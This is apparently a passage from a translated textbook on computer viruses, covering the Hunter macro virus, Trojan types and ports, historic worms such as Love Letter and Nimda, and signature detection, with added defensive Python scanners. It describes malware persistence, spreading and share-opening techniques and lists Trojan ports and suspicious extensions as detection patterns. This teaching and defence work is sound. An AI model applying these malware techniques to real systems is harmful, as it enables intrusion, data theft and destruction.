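    return [name for name, src in modules.items() if analyse_vba(src)["suspicious"]]


# Constructed sample modules (not taken from any real document).
SUSPECT_MODULE = """\
Attribute VB_Name = "ThisDocument"
Private Sub AutoOpen()
    Debug.Print NormalTemplate.FullName
End Sub
Sub FileSaveAs()
    Dialogs(wdDialogFileSaveAs).Show
End Sub
"""

CLEAN_MODULE = """\
Attribute VB_Name = "Report"
Public Function FormatReport(title As String) As String
    FormatReport = UCase(title)
End Function
"""

if __name__ == "__main__":
    print(triage({"ThisDocument": SUSPECT_MODULE, "Report": CLEAN_MODULE}))
```

Plenty of legitimate templates define AutoOpen or replace FileSaveAs, so the output is a list of modules to read, not a verdict; the point of the script is to surface the two properties the text says a spreading macro must have.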
1.4.2.2. Signs that a computer is infected
First the virus tries to connect to the Visual Basic Editor and displays a message box:
Hunter
preciso remover a protecao ANTIVIRUS ofrecida pelo Hunter
antesde utilizar este
servico.
Then the virus copies itself to the file X.BAS under the path C:\. The presence of this file confirms that the virus infected the machine at some point.
1.4.2.3. Method of infection
The virus hooks the file-open event of Microsoft Word 97; any file opened by Microsoft Word 97 becomes infected.
Other names
This macro virus is also known as:
Macro Word97.Hunter
W97M_Hunter
WM97/Antiv-A
1.5. TROJANS
1.5.1. Definition of a Trojan
Many people think that with a good virus scanner and the latest update they are safe: their machine will not be infected by a Trojan and nobody can access their computer. This is entirely wrong. The goal of anti-virus writers is to detect new viruses, not Trojans. When a Trojan has infected many users, anti-virus specialists add it to their scanner. But that is only a very small fraction of Trojans that anti-virus specialists detect and add to the list of threats to remove.
Moreover, these virus scanners are not firewalls; they will not detect a Trojan or protect us while we are online. Many users do not know what a Trojan is and download files of unknown origin.
1.5.2. How Trojans infect a machine
According to statistics from the BKIS centre, 90% of those asked whether they had downloaded or copied files from somewhere could not say no, and in fact had done so a few days earlier.
A Trojan can arrive by many different routes:
- Trojans spread via ICQ
- Trojans spread via e-mail attachments
- Trojans installed by direct access
1/. Trojans received over ICQ:
Many people think a Trojan cannot spread while they are chatting on ICQ, but they do not consider that the person they are chatting with can send them one. ICQ allows an .exe file to be sent, and it can be altered so that it looks like an image or sound file. For example, a Trojan is bundled with a picture and the sender changes the icon of the .exe file to the icon of a .bmp file; the recipient runs the Trojan without any suspicion, because when the .exe runs it still shows the picture as an image file would. The result is a Trojan on the recipient's machine. That is why most users say they never ran any strange file when in fact they did.
The best prevention is to always check the file type before running a file.
2/. Trojans received as mail attachments:
Most Trojans spread by mail. The hacker, or the Trojan's owner, usually attaches the Trojan file to an e-mail and sends it. When the user clicks the attachment, or sometimes merely views the mail, the Trojan can be activated, enter the system and carry out its functions.
3/. Trojans installed by direct access:
Even a computer fitted with the best protective measures and the best antivirus program can do nothing against direct access by someone who deliberately puts a Trojan onto it.
1.5.3. The danger of Trojans
Most people think a Trojan is not dangerous, because their computer keeps working normally and all their data is still there, whereas with a virus the data might be wiped out or the machine might misbehave.
When a computer is infected with a Trojan, all the data on it may be at risk. Usually the Trojan's owner does not delete files; they copy and exploit them, such as the company's confidential documents, Internet accounts and personal accounts, and only when nothing else is left to do might they delete data. Sometimes hackers even use the Trojan to install a destructive virus such as CIH. These are a few examples of what a hacker can do once a Trojan has been installed successfully.
1.5.4. Types of Trojan
There are many Trojans, but they are mainly divided into the following types:
1/. Remote access Trojans:
This type is currently in very wide use. Its main function is to open a port on the victim's computer so that the hacker can come back and access the machine.
It is very easy to use: once the victim is infected and the Trojan's owner has the victim's IP address, they have full access to the victim's machine.
The functions vary with the Trojan (keylogger, download, upload files, execute commands...).
Some well-known Trojans of this type: NetBus, Back Orifice.
2/. Keyboard hooks (keyloggers):
It records every keystroke and saves it to a file; the hacker later reaches the computer and takes the file containing everything the user typed.
Examples: kuang keylogger, hooker, kuang2
3/. Password-sending Trojans:
They read all passwords kept in the cache, together with information about the victim's computer, and send them to the hacker.
Examples: barok, kuang, bario
4/. Destructive Trojans:
These Trojans have a single task: to destroy every file on the computer.
Example: CIH
They are very dangerous, because a single infection is enough to lose all data.
5/. FTP Trojans:
This type opens port 21 on the computer and lets anyone connect to it without a password, with full rights to download any data.
1.5.5. What Trojans are for
Many people think hackers use Trojans only to damage their machines; this is entirely wrong. A Trojan is a very effective tool that lets its user find a great deal of information on the victim's computer:
- Credit card information and customer information.
- Account details and confidential data.
- Lists of e-mail addresses and home addresses.
- Account passwords and everything else that can be learned about the company.
1.5.6. How Trojans operate
When the victim runs the Trojan file, if it is a remote access Trojan, the server part of the Trojan stays listening. It waits until it receives a signal from the client, then immediately opens a port through which the hacker can get in. It may use either TCP or UDP.
Once the hacker connects to the victim's IP address they can do anything that the Trojan's built-in controls allow.
If the Trojan is a keylogger or password sender, it records everything typed on the keyboard. All of it is stored in a file at a fixed path. At some point the Trojan's owner enters the computer through the backdoor the Trojan opened and takes that file. Trojans that contain a send function mail the file to a predetermined e-mail address.
A destructive Trojan loads when Windows starts and then goes about deleting files.
Some Trojans are loaded as soon as Windows starts by editing win.ini, system.ini or the registry.
1.5.7. Ports used by some common Trojans

Name                  Port    Name                    Port
Satanz Backdoor       666     Silencer                10001
Shockrave             1981    Shivka-Burka            1600
WebEx                 1001    SpySender               1807
Doly Trojan           1011    Psyber Stream Server    1170
Ultors Trojan         1234    VooDoo Doll             1245
FTP 99CMP             1492    BackDoor                1999
Trojan Cow            2001    Ripper                  2023
Bugs                  2115    Deep Throat             2140
The Invasor           2140    Phineas Phucker         2801
Masters Paradise      30129   Portal of Doom          3700
WinCrash              4092    ICQ Trojan              4590
Sockets de Troie      5000    Sockets de Troie 1.x    5001
Firehotcker           5321    Blade Runner            5400
Blade Runner 2.x      5402    Robo-Hack               5569
Blade Runner 1.x      5401    DeepThroat              6670
DeepThroat            6771    GateCrasher             6969
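One defensive use of a port table like the one above is to compare it against the ports a machine is actually listening on. The following is an added example, not code from this document: it parses a Windows "netstat -an" style listing (the listing below is constructed) and reports listening TCP ports that appear in a subset of the table. A hit is only a lead to investigate, since legitimate software uses many of the same ports.

```python
"""Check a 'netstat -an' style listing for listening TCP ports that appear
in the Trojan port table above. Added example, not code from the document;
the port names are a subset of the table and the listing is constructed."""
from __future__ import annotations

# Port -> Trojan name, copied from the table above (subset).
TROJAN_PORTS = {
    666: "Satanz Backdoor", 1001: "WebEx", 1011: "Doly Trojan",
    1234: "Ultors Trojan", 1999: "BackDoor", 2140: "Deep Throat",
    5000: "Sockets de Troie", 6969: "GateCrasher", 30129: "Masters Paradise",
}


def parse_listening(netstat_output: str) -> list[int]:
    """Local ports of TCP sockets in LISTENING state.

    Expects the Windows 'netstat -an' columns: Proto, Local Address,
    Foreign Address, State. UDP lines have no state column and are skipped.
    """
    ports = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0].upper() != "TCP":
            continue
        if parts[3].upper() != "LISTENING":
            continue
        # Local address is host:port; rsplit copes with IPv6 brackets too.
        ports.append(int(parts[1].rsplit(":", 1)[1]))
    return ports


def flag_trojan_ports(netstat_output: str) -> list[tuple[int, str]]:
    """(port, Trojan name) for each listening port present in TROJAN_PORTS."""
    return [(p, TROJAN_PORTS[p])
            for p in parse_listening(netstat_output) if p in TROJAN_PORTS]


# Constructed listing: two normal Windows ports, two ports from the table,
# one outbound connection and one UDP socket.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:6969           0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1033      203.0.113.5:80         ESTABLISHED
  TCP    0.0.0.0:30129          0.0.0.0:0              LISTENING
  UDP    0.0.0.0:137            *:*
"""

if __name__ == "__main__":
    for port, name in flag_trojan_ports(SAMPLE_NETSTAT):
        print(f"port {port} is listening and matches {name}")
```

The next step on a real host is to map the flagged port to its owning process (netstat -ano on Windows shows the PID) rather than trusting the port number alone.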
1.6. INTERNET WORM
1.6.1. General introduction
The Internet worm is the kind of virus with the widest and fastest spread, and the most common today. A worm combines the destructive power of a virus, the stealth of a Trojan and, above all, the formidable propagation that virus writers give it, which turns it into a destroyer armed with state-of-the-art weapons. Typical examples are Melissa and Love Letter. With their terrifying spread they paralysed a whole series of server systems and clogged Internet links.
Initially, "worm" referred to viruses that spread by finding the addresses in the address book of the machine they infected and mailing themselves to those addresses.
The addresses the virus finds are usually those of friends, relatives, customers... of the owner of the infected machine. The danger is that the virus can forge the sender address as that of the machine's owner or of any individual; moreover, the e-mails the virus sends usually have sensational or attractive content to lure the recipient into opening the attached virus file. Some viruses even quote the content of an e-mail from the victim's mailbox to build the body of the forged mail, which makes it look more genuine and the recipient easier to deceive. All of this happens without our knowledge. Repeating exactly the same process on other victim machines, the worm can spread worldwide exponentially in a short time. This explains how Melissa and Love Letter could reach tens of millions of computers within a few hours. Its name, worm or "Internet worm", evokes computer viruses crawling from one computer to another along the "branches" of the Internet.
With such fast and wide propagation, worm authors often add many special features, such as the ability to set a date and time and launch a simultaneous attack from the victim machines (millions of them) on a chosen address. They may also carry backdoors dropped onto the victim machine, allowing their owner to enter the victim's machine and do anything as if sitting at it, illegally.
Today the notion of a worm has broadened to include viruses that spread over peer-to-peer file-sharing networks, over USB drives or instant messaging (chat) services, and especially viruses that spread by exploiting software vulnerabilities.
Software (operating systems above all, and the services running on them) always harbours security bugs such as buffer overflows, and they are not always easy to find. When a software vulnerability is discovered, viruses soon appear that exploit it to infect remote computers silently, without the owner's knowledge. From those machines the worm goes on to crawl to other computers on the Internet in the same way.
The danger of Internet worms can be seen by studying the MyDoom worm.
Date the first MyDoom worm appeared: 26/01/2004
Date it reached Vietnam: 27/01/2004
The MyDoom attack peaked on 31/01/2004, when roughly a million MyDoom-infected e-mails were sent simultaneously to the Yahoo website, choking its links.
Firewalls and filters were raised immediately to block and discard every e-mail with the subjects Test, Hi, Hello, Mail Delivery System, Mail Transaction Failed, Server Report or Status Error, even though these are subjects Yahoo itself uses.
Despite the protection put in place in time, the Yahoo site was hit by a DoS (Denial of Service) attack from 8:17 to 12:10 on 31/01/2004, and typing http://www.mail.yahoo.com/ brought up http://www.search.com/ instead. Almost all activity on the site was paralysed.
A new variant, called MyDoom.B (also known as Novarg.A and Mimailk), can block access to websites that provide antivirus software.
The original MyDoom program only generated a flood of junk mail and concentrated on preparing a massed attack on the website of SCO Group Inc. from 01 to 12/02/2004. The new variant MyDoom.B adds a command to attack the Microsoft website as well.
The MyDoom worm was written so as not to attack e-mail addresses of government agencies, some universities and some computer security vendors, including Symantec. Computers running Microsoft Windows XP were most at risk of infection.
According to technology experts, the financial damage from MyDoom, including the disruption of the Internet, is estimated in the billions of dollars.
The MyDoom removal software was first updated on 28/01/2004 (by Symantec).
160,000 infected e-mails were sent to a single company within 60 minutes in the USA.
Most ports opened: 71 ports, from port 3127 to port 3198. Symantec counted up to 2,100 different systems on the network scanning for the backdoors MyDoom created.
50,000 computer systems were infected and under remote control, at risk of a massed attack.
300 million virus-carrying mails were sent, 1/12 of all e-mail traffic on the Internet over two days. 500,000 computers were infected with MyDoom within 3 days of the worm's discovery.
142 countries were infected.
1.6.2. Stages in the development of Internet worms
By analysing the typical Internet worms of each stage, we can see the principles on which Internet worms are built, how fast this kind of virus has developed and how dangerous it is.
1.6.2.1. The Morris worm
The Morris worm was the first computer worm distributed over the Internet and also the first worm to attract significant attention from the mass media.
Its author was Robert Tappan Morris, a student at Cornell University. The Morris worm was released onto the network on 2 November 1988 from MIT; it was launched from MIT to hide the fact that the worm originated at Cornell. (Robert Tappan Morris is now a professor at MIT.)
The serious mistake that turned the worm from a potentially harmless intellectual experiment into a destructive denial-of-service worm lay in its spreading mechanism. The worm decided whether to infect a new computer by asking whether a copy was already running there. But doing only that would have made it too easy to defeat: anyone could run a process that answered "yes" when asked whether a copy existed, and the worm would stay away. To avoid this, Morris designed the worm to duplicate itself with a probability of 40% regardless of the result of the infection check. In practice that rate proved far too high: the worm spread rapidly and infected some computers many times over.
It is estimated that about 6,000 Unix computers were infected by the Morris worm. Paul Graham said: "I watched people cook up this number, and the recipe was: someone guessed that there were about 60,000 computers connected to the Internet, and that the worm could have infected 10% of them." The estimated damage ranged from 10 to 100 million dollars.
Robert Morris was tried and convicted of violating the 1986 Computer Fraud and Abuse Act. After appeal he was sentenced to 3 years' probation, 400 hours of community service and a fine of 10,050 US dollars.
The Morris worm is sometimes called the "Great Worm" because of the heavy consequences it had on the Internet of the time, both in total system downtime and in its psychological effect on perceptions of the Internet's security and reliability.
1.6.2.2. The Kak worm
Kakworm (KAK) is a worm. It was built to exploit a vulnerability in the protection of the Internet Explorer browser and the Outlook Express program. Microsoft released a patch for this vulnerability, and it had to be applied immediately (Microsoft security bulletin MS99-032). Other Microsoft browsers and e-mail programs were not affected.
KAK is embedded in the HTML signature of the message. The user does not see it, because there is no text to display it on screen (KAK is written in JavaScript).
The user does not have to click any attachment or take any action to trigger KAK. Simply viewing the mail is enough for the KAK worm to enter the system.
Once triggered, KAK saves the file KAK.HTA in the Windows startup folder. The next time the computer starts, KAK.HTA runs and creates KAK.HTA in the Windows folder.
Once a month, after five in the afternoon, the KAK worm displays a message "Kagou-Anti-Krosoft" saying "not today" and then shuts the computer down.
KAK was built on Bubbleboy, the first worm able to spread without the user opening an attachment.
1.6.2.3. The Love Letter worm
In its original form the worm mailed itself to users as an e-mail attachment. The subject was "I LOVE YOU" and the body read "kindly check the attached LOVELETTER coming from me". The attachment was called LOVE-LETTER-FOR-YOU.TXT.vbs (double extension .txt.vbs). Clicking the attachment ran it (assuming Windows Scripting Host was installed) and the infection cycle started again.
The double extension matters to this worm, because it exploits a convenience feature: mail programs and folder views hide file extensions by default. With the default options the attachment appeared to be called LOVE-LETTER-FOR-YOU.TXT, that is, a text file rather than an executable.
In operation the worm performs several actions:
It checks for the file WinFAT.32.exe in the Internet Explorer download folder. If it is not found, the worm changes the Internet Explorer start page to one of several websites from which the file WIN-BUGSFIX.exe is downloaded and set to run on the computer at the next start.
The worm copies itself to two places from which it is executed at every restart of the computer.
It tries to send itself to every address in the Outlook address list.
The worm searches for all files with the extensions VBS, VBE, JS, JSE, CSS, WSH, SCT or HTA. Any it finds are overwritten with the virus and their extension is renamed to .VBS.
Image files with the extension JPG or JPEG are also overwritten with the virus, and the extension .VBS is appended to their names.
Multimedia files with the extension MP2 or MP3 are copied to a new file of the same name with .VBS appended.
The worm looks for an mIRC client and, if one is found, drops a copy together with an HTML file designed to send the worm over mIRC.
The original virus files had a great deal of influence; many variants developed quickly and spread widely. More than 20 variants were reported, and over time the real number of variants exceeded the reported number. A few of the most striking:
Subject "fwd:", no body, attachment: very funy.vbs.
Subject "Mothers Day", with the body: "We have proceeded to charge your credit card for the amount of $326.92 for the mothers day diamond special. We have attached a detailed invoice to this email. Please print out the attachment and keep it in a safe place. Thanks again and have a happy mothers day!" [email protected], attachment: mothersday.vbs.
Subject "virus ALERT!!!", from: [email protected], body: "Dear Symantec customer, Symantec's AntiVirus Research Center began receiving reports regarding VBS.LoveLetter, a virus, early in the morning of 4 May 2000 GMT. This worm appears to originate from the Asia Pacific region. Distribution of the virus is widespread and hundreds of thousands of machines are reported infected", attachment: protect.vbs.
Subject "How to protect yourself from the ILOVEYOU bug!", body: "Here's the easy way to fix the love virus", attachment: Virus-Protection-Intruction.vbs.
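Both the ICQ Trojan case in section 1.5.2 (an .exe whose icon claims to be an image, with the advice to check the file type before running it) and the hidden .TXT.vbs double extension above come down to the same check: compare what the file name claims with what the content is. The following is an added example, not code from this document; the attachments are constructed, and the extension list is the one from the Love Letter section plus exe and com.

```python
"""Check an attachment's name and leading bytes before it is run: the
'always check the file type' advice from the ICQ Trojan section and the
hidden double extension (.TXT.vbs) used by Love Letter. Added example, not
code from the document; the attachments below are constructed."""
from __future__ import annotations

# Extensions Windows runs as programs or scripts: the list from the Love
# Letter section plus exe/com.
RUNNABLE_EXTS = {"exe", "com", "vbs", "vbe", "js", "jse", "wsh", "sct", "hta"}

# Leading bytes of a few common formats ("MZ" is the DOS/Windows executable
# header; the image signatures are standard for those formats).
MAGIC = [
    (b"MZ", "windows executable"),
    (b"BM", "bmp image"),
    (b"\xff\xd8\xff", "jpeg image"),
    (b"\x89PNG", "png image"),
]


def content_type(data: bytes) -> str | None:
    """Format implied by the first bytes, or None if unrecognised."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return None


def assess_attachment(filename: str, data: bytes) -> list[str]:
    """Reasons the attachment deserves suspicion; empty when nothing stands out."""
    reasons = []
    exts = filename.lower().split(".")[1:]      # every extension after the base name
    if exts and exts[-1] in RUNNABLE_EXTS:
        if len(exts) >= 2 and exts[-2] not in RUNNABLE_EXTS:
            # e.g. .txt.vbs: with extensions hidden the user sees only ".txt"
            reasons.append(f"double extension .{exts[-2]}.{exts[-1]} hides a runnable type")
        else:
            reasons.append(f"runnable type .{exts[-1]}")
    kind = content_type(data)
    if kind == "windows executable" and (not exts or exts[-1] not in {"exe", "com"}):
        claimed = "." + exts[-1] if exts else "no extension"
        reasons.append(f"content is a windows executable but the name claims {claimed}")
    return reasons


# Constructed samples: the Love Letter name, an executable renamed as a
# bitmap, a genuine JPEG and a plainly named executable.
SAMPLES = {
    "LOVE-LETTER-FOR-YOU.TXT.vbs": b"On Error Resume Next",
    "holiday.bmp": b"MZ\x90\x00\x03\x00",
    "photo.jpg": b"\xff\xd8\xff\xe0",
    "setup.exe": b"MZ\x90\x00",
}


def assess_all(samples=SAMPLES) -> dict[str, list[str]]:
    return {name: assess_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, reasons in assess_all().items():
        print(name, "->", reasons or ["nothing unusual"])
```

The icon trick from the ICQ section is not visible to this check (icons live inside the executable's resources), which is exactly why the name and the leading bytes, not the icon, are what to look at.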
1.6.2.4. The Melissa worm
Melissa is a combination of a macro virus and an e-mail worm. The worm was first found on Friday, 26 March 1999, and it spread around the world very quickly. Essentially, when a user clicks the .DOC file attached to an e-mail, the macro virus runs. One of the first things the virus does is compose and send a message to the first 50 addresses in the Outlook address list. The subject line is "Important Message From ..." and the body reads "Here is that document you asked for ... (don't show anyone else)".
Attached to this message is the document currently being worked on. Since Melissa is a virus and infects the NORMAL.DOC file, it can send an infected file out as if it were something very important from the computer that received it.
In the rare case where the minute, hour, day and month coincide (8:08 on 8 August), the virus inserts the text "Twenty-two, plus triple-word score, plus fifty points for using all my letters. Game's over."
The initial distribution of the Melissa virus was in a file called LIST.DOC, which contained passwords for X-rated, unwholesome websites.
1.6.2.5. The Nimda worm
Nimda is one of the more complex worms ever built. It infects files, spreads through websites and through e-mail, and spreads by exploiting the local network. It infects every version of Windows from Windows 95 to Windows 2000, as well as Microsoft IIS.
Nimda also spreads through poorly secured websites, so that browsers become infected simply by viewing a web page. Finally, Nimda was the first worm to use the user's computer to scan the local network for vulnerable machines behind the firewall that it could attack (before that, only worms spreading through servers did this).
Nimda uses several known weaknesses in Microsoft IIS servers. Some of these weaknesses are described at:
http://www.microsoft.com/tech/security/bulletin/ms00-078.asp
http://www.microsoft.com/tech/security/bulletin/ms01-020.asp
The Nimda worm uses the following methods to propagate:
- From client to client via e-mail and infected .EXE files.
- From client to client via local network shares.
- From web server to client by browsing infected websites.
- From client to web server by active scanning for and exploitation of the Microsoft IIS 4.0/5.0 directory traversal vulnerability.
- From client to web server by scanning for the backdoors left behind by the Code Red II and sadmind/IIS worms.
1/. File infection:
Nimda behaves like any standard file infector. It looks for .EXE files and adds itself to them as a resource. When an infected .EXE is downloaded by a user, its reach grows. Likewise, if an infected file sits on a machine in a local network, shared files can spread the Nimda worm's influence further.
When an infected file runs it infects other files. Nimda tries to delete this file when it finishes, but cannot always do so; to achieve it, it creates a WININIT.INI with commands that delete the file the next time Windows starts.
Nimda looks for files to infect. It finds the .EXE files to spread to by searching the following keys and all their subkeys:
[SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths]
[SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
Notably, the file WINZIP32.EXE is not infected.
2/. Role as an e-mail worm:
In another respect Nimda behaves like other worms. It searches the victim machine's e-mail client address lists and the HTML files on the computer for e-mail addresses, and then sends itself to those addresses as an attachment.
The first MIME part is declared as text/html but contains no content. The second is declared as audio/x-wav but contains an attachment named README.EXE, which is the program.
Nimda uses its own SMTP engine to send the e-mail.
3/. Role as a web worm:
Nimda scans the Internet for Microsoft IIS web servers. When a server is found, if it has a vulnerability that can be exploited to get in, Nimda enters and modifies random web pages on the server (as well as .EXE files on the server). These modifications let the worm spread to users who are simply browsing the website.
To do this, Nimda looks for the source of .HTML and .ASP files. When found, it appends a JavaScript routine to the end of the .HTML and .ASP files. This JavaScript opens a file named README.EML when loaded by a web browser. README.EML is another form of the worm, placed in the directory where the .HTML files above were found. Unpatched browsers execute these files automatically without the user clicking anything. The user does not notice the worm running, because it runs in a minimised window.
Infection through shared files: to spread to computers on a local network, the worm looks for other machines through open file shares. Whenever it finds one, Nimda transfers its system or hidden file (RICHED20.DLL) onto the other machine, into any folder where document files with the extension .DOC or .EML are found. After that, if those files are opened with Word, WordPad or Outlook, the hidden RICHED20.DLL is executed automatically as well. This is what infects that computer.
At the same time, Nimda tries to replace the Windows RICHED20.DLL and places files with the extension .EML (sometimes .NWS) into the folders it can reach.
Nimda on the victim's computer: Nimda usually arrives as a README.EXE attachment to an e-mail, but it can appear under any other name. The .EXE file is a little over 50 KB in its basic original form. When run, it first copies itself to a temporary folder under a random name of the form MEP*.TMP (where * stands for random characters). Then, from that folder, it executes itself with the command-line option -dontrunold.
Arithmetic checks let the worm decide whether it can delete the file (in the temporary folder). If it can, the worm builds its primary infection tool: a MIME-encoded copy of itself that can be attached to multipart messages. These new worm copies are given random names and stored in a temporary folder. It is now ready to go to work.
Finally, the worm copies itself to RICHED20.DLL in the Windows\System folder and sets the file's hidden and system attributes. Once executed, Nimda looks for shared network resources and starts scanning shared files. Among the files it looks for are those with the extensions .DOC and .EML; when found, RICHED20.DLL is copied into their folder so that it runs when an OLE component is loaded on the remote computer. This in turn starts the infection on the remote machine.
Some copies of the worm also do the following:
They modify the key [Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] so that hidden files are no longer visible. This hides the worm in Explorer.
They create a Guest account on the infected system and add the Guest and Administrator accounts to a special group. Using this, they create a share "c:\" with full special access rights.
They delete the subkeys of [SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security], which has the effect of disabling share security.
Chapter 2. IDENTIFYING AND DETECTING VIRUSES
2.1. VIRUS IDENTIFICATION TECHNIQUES
2.1.1. Exact signature matching (signature-based detection)
This is the exact identification of a virus once the antivirus (AV) program has a sample of it. The technique can be described simply as follows: the files to be checked are analysed and compared with known virus samples; if a fragment of virus code is found, the file may be infected and the software takes measures to remove the virus from it.
Exact signature matching forces the software to update its database continuously so that it can recognise new viruses and their variants.
All antivirus programs use this technique to scan for viruses. The larger the number of signatures, the higher the AV's ability to remove viruses.
Every other identification technique was created to compensate for the shortcomings of this one.
+ Advantages of exact signature matching:
The accuracy of identification is high, with few mistakes.
The result of the removal is better. Approximate techniques only allow a file to be suspected of being a virus; exact identification allows the symptoms that accompany the virus to be removed and the system restored.
+ Disadvantages of exact signature matching:
Its biggest weakness is that it cannot cope with new or not-yet-seen viruses for which there is no signature yet.
The database storing the virus signatures is large, which makes the antivirus software large.
The technique requires continuous database updates, which cost time, money and effort.
2.1.2. Identification by representative code
Any file is at bottom a long string of numbers, so we can treat it as a string and take a hash of it. By its nature this hash is almost unique. Once we have a sample of a virus we can derive a hash from it, and deciding whether a file is a virus is then a matter of hashing the file and comparing its hash with the sample's hash. There are two ways to identify by hash: hashing the whole file, and hashing only an important part of it.
2.1.2.1. Taking the hash of the whole file
The simplest way to create a characteristic fingerprint for a virus sample is to compute a hash of the entire sample file. The hash algorithms usually used here are MD5, SHA1, SHA256..., whose low collision probability lets the hash serve as a fingerprint for the file.
+ Advantages:
Simple to implement.
+ Disadvantages:
High computational cost and slow hashing time, especially for large files. This weakness shows clearly when scanning every file in the system.
2.1.2.2. Taking the hash of an important part
To overcome the above weakness, the method is refined by hashing only some important part of the file. For executables (.exe, .com, .dll, .sys...), for example, the important part may be the PE (Portable Executable) header, or the region around the program's Entry Point. Which region counts as important depends on each AV vendor's own strategy.
+ Advantages:
Hashing speed improves significantly compared with hashing the whole file.
+ Disadvantages:
More complicated to implement than whole-file hashing.
Not every file format allows a region of important, characteristic information to be chosen; it can only be applied to certain formats.
2.1.3. String scanning
This is the most classic method and is still widely used in most AV products today. A string is checked at a specific offset:
2.1.3.1. Fully static offset
In this approach we simply record which string occurs at which offset, and use that signature to decide whether a file is a virus or not. The string chosen to recognise a virus is usually based on the specifics of each virus, so the chosen string may differ from virus to virus.
+ Advantages:
Updating a signature and scanning are quite easy to implement.
+ Disadvantages:
This kind of scan copes poorly with virus families: for example, if one inserts or deletes a byte in the virus's binary (keeping the virus runnable) before the signature's offset, this method inevitably fails to recognise the modified sample.
2.1.3.2. Relative offset
Here the offset is computed relative to some component (such as the Entry Point, the n-th section...).
This can be generalised to offsets of the form: Entry Point + N.
Let us look at an example comparing the structure of two different variants of the virus w32.funnyIM.worm.
First we determine the Entry Point addresses of the two virus samples.
We observe the following figure:
[Figure: strings of the two virus samples]
We get two corresponding strings at two different offsets (from here on, whenever strings from a binary file are mentioned I write them as a sequence of hexadecimal numbers for ease of reading).
Looking at the two tables above, we can build a common signature for both viruses:
String: 64 75 6E 67 63 6F 69 00
Offset: Entry Point address + 60
+ Advantages:
Generalising in this way widens the range of viruses recognised. For example, when some bytes are modified as above, if the bytes after the Entry Point are still as before, the sample can still be recognised by a signature updated in this way.
+ Disadvantages:
Updating requires more information than the static-offset method.
The scan engine needs a more complex mechanism to support this scanning mode.
Because this method derives the offset from information in a suitable file format, it is limited to certain file formats.
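The four identification methods of sections 2.1.2 and 2.1.3 (whole-file hash, hash of the region at the Entry Point, a string at a fixed offset, and a string at an Entry Point-relative offset) can be shown side by side on two variants that differ only by one byte inserted before the Entry Point, the modification described above. The following is an added example, not code from this document: it uses a constructed toy header (a magic value plus the Entry Point's file offset) in place of real PE parsing, the string and the +60 offset come from the page, and the fixed offset 68 is simply where that string lands in the first constructed sample.

```python
"""Signature matching on an executable: whole-file hash, hash of the region
at the entry point, a string at a fixed offset, and a string at an
entry-point-relative offset. Added example; it uses a constructed toy
header (magic + entry-point offset) in place of a real PE header."""
from __future__ import annotations
import hashlib
import struct

MAGIC = b"TOYX"                                   # constructed toy format
SIG = bytes.fromhex("64 75 6E 67 63 6F 69 00")   # the string from the text
SIG_DELTA = 60                                    # the text's Entry Point + 60


def entry_point(data: bytes) -> int:
    """Read the entry-point file offset from the toy header (bytes 4..7)."""
    if data[:4] != MAGIC:
        raise ValueError("not a toy executable")
    return struct.unpack_from("<I", data, 4)[0]


def whole_file_hash(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def entry_region_hash(data: bytes, length: int) -> str:
    """Hash only `length` bytes starting at the entry point (partial hash)."""
    ep = entry_point(data)
    return hashlib.sha256(data[ep:ep + length]).hexdigest()


def match_absolute(data: bytes, sig: bytes, offset: int) -> bool:
    return data[offset:offset + len(sig)] == sig


def match_relative(data: bytes, sig: bytes, delta: int) -> bool:
    ep = entry_point(data)
    return data[ep + delta:ep + delta + len(sig)] == sig


SIGNATURES = [
    # Offset 68 is where SIG lands in the first constructed sample below.
    {"name": "w32.funnyIM.worm (fixed offset)", "kind": "absolute",
     "offset": 68, "bytes": SIG},
    {"name": "w32.funnyIM.worm (EP-relative)", "kind": "relative",
     "offset": SIG_DELTA, "bytes": SIG},
]


def scan(data: bytes, signatures=SIGNATURES) -> list[str]:
    """Names of every signature that matches `data`."""
    hits = []
    for s in signatures:
        matcher = match_absolute if s["kind"] == "absolute" else match_relative
        if matcher(data, s["bytes"], s["offset"]):
            hits.append(s["name"])
    return hits


def build_sample(padding: int) -> bytes:
    """Constructed sample: 8-byte header, `padding` filler bytes, then code.

    The code is 60 filler bytes (0x90) followed by SIG, so SIG always sits at
    Entry Point + 60. Building two samples with different padding models the
    text's variants: bytes inserted before the entry point shift every
    absolute offset but leave the entry-relative layout unchanged.
    """
    ep = 8 + padding
    code = b"\x90" * SIG_DELTA + SIG + b"\xc3"
    return MAGIC + struct.pack("<I", ep) + b"\x00" * padding + code


if __name__ == "__main__":
    a, b = build_sample(0), build_sample(1)
    for label, sample in (("variant A", a), ("variant B", b)):
        print(label, "EP =", entry_point(sample), "hits:", scan(sample))
    print("whole-file hashes equal:", whole_file_hash(a) == whole_file_hash(b))
    print("entry-region hashes equal:", entry_region_hash(a, 69) == entry_region_hash(b, 69))
```

Variant B is caught by the EP-relative signature and by the entry-region hash but not by the fixed-offset signature or the whole-file hash, which is the trade-off the two sections describe: the relative forms survive small edits before the Entry Point, at the price of needing a parser for the file format.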
2.1.4. Recognising suspicious behaviour
Recognising suspicious behaviour is an "intelligent" feature that not every antivirus product has. Put simply, the antivirus software watches for abnormal activity in the system so that it can detect viruses not yet in its database, or other malicious software, warn the user, isolate the virus and have it ready to send to the vendor for analysis and inclusion in the next database update.
Antivirus products usually let this feature be switched on or off and its level be set (aggressive, medium or low; the default is usually medium), because most implementations consume resources and slow down weaker machines.
2.1.5. Continuous monitoring
Antivirus software usually monitors continuously, in real time, to protect the system. Continuous monitoring scans every file the system accesses, and every file from the moment it starts being copied onto the system, using signature comparison and suspicious-behaviour tracking.
2.1.6. Combining methods
